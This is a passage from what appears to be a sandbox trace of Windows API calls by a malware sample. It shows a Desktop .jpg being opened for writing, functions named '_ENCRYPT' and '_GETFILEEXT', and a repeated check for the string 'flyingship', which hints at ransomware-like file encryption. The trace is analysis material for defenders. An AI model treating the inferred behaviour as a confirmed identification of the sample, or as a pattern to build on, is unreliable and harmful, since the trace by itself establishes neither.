0x76e600 [0076.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0076.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0076.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0076.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0076.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696a48 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0076.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.116] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0076.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0076.117] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.118] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76b1b0 [0076.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76b1b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0076.118] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f5bqoll3uym0camplpj.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.118] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0076.119] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.119] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0076.119] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.119] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.119] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.119] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76dfa0 [0076.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76dfa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.121] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.121] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0076.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0076.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0076.121] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0076.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.121] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0076.121] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.121] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0076.121] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0076.121] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0076.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.121] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.121] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.121] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb264fec0, ftCreationTime.dwHighDateTime=0x1d5ddb5, ftLastAccessTime.dwLowDateTime=0xf6077c70, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0xf6077c70, ftLastWriteTime.dwHighDateTime=0x1d5e5fd, nFileSizeHigh=0x0, nFileSizeLow=0x13eeb, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6F5BQoLL3Uym0CamPlpJ.jpg", cAlternateFileName="6F5BQO~1.JPG")) returned 0x6b89b8 [0076.122] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.122] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb264fec0, ftCreationTime.dwHighDateTime=0x1d5ddb5, ftLastAccessTime.dwLowDateTime=0xf6077c70, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0xf6077c70, ftLastWriteTime.dwHighDateTime=0x1d5e5fd, nFileSizeHigh=0x0, nFileSizeLow=0x13eeb, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6F5BQoLL3Uym0CamPlpJ.jpg", cAlternateFileName="6F5BQO~1.JPG")) returned 0x6b89b8 [0076.122] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.122] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.123] CompareStringW (Locale=0x400, 